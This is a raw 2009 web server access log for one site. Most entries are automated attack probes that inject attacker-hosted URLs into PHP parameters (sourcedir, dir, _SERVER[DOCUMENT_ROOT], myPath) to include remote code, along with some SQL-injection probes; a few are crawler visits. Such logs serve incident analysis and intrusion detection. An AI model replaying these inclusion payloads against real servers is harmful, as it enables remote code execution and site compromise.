208.89.214.167 - - [01/Nov/2009:19:49:13 -0800] "GET /logs/access_090329.log%20%20//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:19:49:14 -0800] "GET /logs//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:19:49:47 -0800] "GET /login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:19:49:48 -0800] "GET /logs/access_090329.log%20%20//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:19:49:48 -0800] "GET /logs//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
64.34.111.74 - - [01/Nov/2009:19:51:17 -0800] "GET /logs/access_090329.log///vwar/backup/errors.php?error=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:49 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:49 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:49 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:49 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:57 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:19:58:58 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [01/Nov/2009:20:02:31 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.budapestcapital.com"
211.40.68.132 - - [01/Nov/2009:20:02:31 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:20:06:21 -0800] "GET /logs/access_090501.log//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:20:06:21 -0800] "GET /logs/access_081231.log//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:20:07:16 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:20:07:22 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:20:07:37 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:20:07:47 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [01/Nov/2009:20:07:55 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:14:21 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:14:22 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:14:22 -0800] "GET /logs/access_090301.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:14:27 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:16:38 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:16:38 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:16:38 -0800] "GET /logs/access_090301.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:16:47 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
209.200.237.152 - - [01/Nov/2009:20:17:17 -0800] "GET /logs/access_090331.log//mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [01/Nov/2009:20:17:18 -0800] "GET /logs//mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
209.200.237.152 - - [01/Nov/2009:20:17:50 -0800] "GET /mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:20:29 -0800] "GET /logs/access_090301.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:20:37 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
209.200.237.152 - - [01/Nov/2009:20:21:34 -0800] "GET /logs/access_090329.log//mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:23:03 -0800] "GET /logs/access_090301.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:23:04 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:27:22 -0800] "GET /logs/access_090329.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.195.112.125 - - [01/Nov/2009:20:30:27 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
66.163.197.88 - - [01/Nov/2009:20:35:02 -0800] "GET /logs/access_090329.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:13 -0800] "GET /logs/access_090329.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:13 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:14 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:16 -0800] "GET /logs/access_090329.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:16 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:16 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:21 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:21 -0800] "GET /logs/access_090329.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:21 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:25 -0800] "GET /logs/access_090329.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:25 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:35:25 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:36:28 -0800] "GET /logs/access_090329.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:36:28 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:36:28 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:36:32 -0800] "GET /logs/access_090329.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:36:32 -0800] "GET /?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:36:32 -0800] "GET /logs//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:37:34 -0800] "GET /logs/access.log//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
81.176.226.164 - - [01/Nov/2009:20:38:16 -0800] "GET /logs/access.log%20%20//?sourcedir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
119.63.198.49 - - [01/Nov/2009:20:39:31 -0800] "GET / HTTP/1.1" 200 916 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.budapestcapital.com"
67.195.112.125 - - [01/Nov/2009:20:46:06 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
119.63.198.23 - - [01/Nov/2009:21:02:51 -0800] "GET / HTTP/1.1" 200 916 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.budapestcapital.com"
202.88.229.100 - - [01/Nov/2009:21:12:21 -0800] "GET /logs/access_090329.log%20%20//?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.88.229.100 - - [01/Nov/2009:21:12:21 -0800] "GET /?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.88.229.100 - - [01/Nov/2009:21:12:21 -0800] "GET /logs//?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:21:14:01 -0800] "GET /logs/access_090329.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [01/Nov/2009:21:17:54 -0800] "GET /logs/access_090329.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:22 -0800] "GET /logs/access_090329.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:22 -0800] "GET /logs/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:22 -0800] "GET /?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:33 -0800] "GET /logs/access_090329.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:33 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:33 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:37 -0800] "GET /logs/access_090329.log/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:37 -0800] "GET /?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:29:37 -0800] "GET /logs/?sourcedir=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.40.68.132 - - [01/Nov/2009:21:30:21 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.budapestcapital.com"
211.40.68.132 - - [01/Nov/2009:21:30:21 -0800] "GET /setup.php?setup[use_category]=1&dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:30:43 -0800] "GET /logs/access_090329.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:30:43 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:30:43 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [01/Nov/2009:21:31:50 -0800] "GET /logs/access_090329.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [01/Nov/2009:21:31:50 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.98.47.66 - - [01/Nov/2009:21:31:50 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aldi.webng.com/data/id1.txt%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:36:52 -0800] "GET /logs/access_090329.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
85.111.12.199 - - [01/Nov/2009:21:36:54 -0800] "GET /logs/access_090329.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.88.229.100 - - [01/Nov/2009:21:41:24 -0800] "GET /logs/access_090329.log//?sourcedir=http://www.artofgaming.it/site/rss/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:46:46 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:46:46 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:46:46 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:46:51 -0800] "GET /logs/access_090331.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:10 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:16 -0800] "GET /logs/access_090331.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:20 -0800] "GET /logs/access_090329.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:21 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:47:25 -0800] "GET /logs/access_090331.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:21 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:21 -0800] "GET /logs/access_090331.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:21 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:50 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:50 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:50 -0800] "GET /logs/access_090331.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:53 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:53 -0800] "GET /logs/access_090331.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 200 3374 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:57 -0800] "GET /logs/access_090331.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:21:50:57 -0800] "GET /logs/access_090329.log//?_SERVER[DOCUMENT_ROOT]=http://brus.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
119.63.193.62 - - [01/Nov/2009:21:51:26 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.budapestcapital.com"
218.149.84.14 - - [01/Nov/2009:21:58:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.budapestcapital.com"
